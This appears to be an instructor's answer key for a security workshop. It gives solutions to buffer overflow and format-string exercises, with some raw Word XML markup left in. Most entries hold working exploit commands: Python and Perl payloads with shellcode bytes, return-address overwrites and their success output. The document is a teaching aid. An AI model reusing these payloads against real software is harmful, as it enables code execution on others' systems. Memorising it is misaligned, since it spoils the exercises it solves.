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file contains the solutions to our demos and exercises. Please include a short write up or description about the program, how to exploit it, and what the command for it is. We may hand this out at the end of the event.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//djiang7 … in progress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 sure to turn off ASLR!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buffer_overflow_demo1:</w:t>
        <w:tab/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">./buffer_overflow_demo1 "$(python -c 'print "A"*132')"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">buffer_overflow_demo2:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Similar to cs 460 lab. Need to put shellcode in buffer, overflow with A’s, overwrite ret addr with buffer addr to exec shellcode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./buffer_overflow_demo2 "$(python -c 'print "A"*1028')"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Answer: # ./buffer_overflow_demo2 "$(python -c 'print "\x66\x81\xec\x01\x01\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33" + "A"*939+"\xd8\xc8\xff\xff"')"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The address of buffer is 0xffffc8d8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Congratulations!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Response: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The address of buffer is 0xffffc898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Congratulations!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buffer_overflow_example1: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Overflow buffer to overwrite secret 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./buffer_overflow_example1 "$(python -c 'print "A"*32')"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br w:type="textWrapping"/>
        <w:t xml:space="preserve">buffer_overflow_example2:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Buffer is too small; put shellcode after buffer. Overflow buffer, overwrite ret addr with an address after the ret addr location (buffer address + some amount),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./buffer_overflow_exercise2 `perl -e 'print("A"x20 . "\x70\xd0\xff\xff" . "\x66\x81\xec\x01\x01" . "\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33")'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The address of buffer is 0xffffd058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Congratulations!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br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">buffer_overflow_example3:</w:t>
        <w:br w:type="textWrapping"/>
        <w:tab/>
        <w:t xml:space="preserve">integer overflow Need to overflow with at least 32668 A’s (to cause integer overflow on short int type. </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">./buffer_overflow_example1 "$(python -c 'print "A"*32768')"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Answer: # ./buffer_overflow_exercise3 "$(python -c 'print "\x66\x81\xec\x01\x01\xbb\x21\x60\x57\x17\xda\xc2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0f\x31\x58\x13\x03\x58\x13\x83\xc0\x25\x82\xa2\x7d\x2e\x1a\xd4\xd0\x56\xf2\xcb\xb7\x1f\xe5\x7c\x17\x6c\x82\x7c\x0f\xbd\x30\x14\xa1\x48\x57\xb4\xd5\x5c\x98\x39\x26\x05\xfb\x51\x49\xe5\xb8\xce\xfb\x82\x4c\x70\x70\x39\xdd\x13\x0c\xa8\x72\xba\x9f\x0b\x8d\x15\x33\xc2\x6c\x54\x33" +"A"*941 + "\x96\x4c\xff\xff" + "A"*31734')"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Response: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The address of buffer is 0xffff4c96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The length of the argument is -32768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Congratulations!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mitsdar2 … also in progress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USEFUL_INFO.txt contains a link to a website that contains some explanations and visuals that might help with format string.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README_LINUX.txt contains how to compile the .c and turn off ASLR for Linux.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fs_example: This is meant to be an example that shows very simply what happens when you provide more format specifiers than parameters.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./fs_example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fs_1: The vulnerability here is that a user-specified argument is passed directly to a printf() rather than by passing it as a parameter. Should be: printf(“%s”,arg[1]) but it is actually printf(arg[1]). Characters are not escaped, but instead “parameters” are taken off the stack.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./fs_1 &lt;anything containing %s&gt;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./fs_1 hello_%s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./fs_1 %s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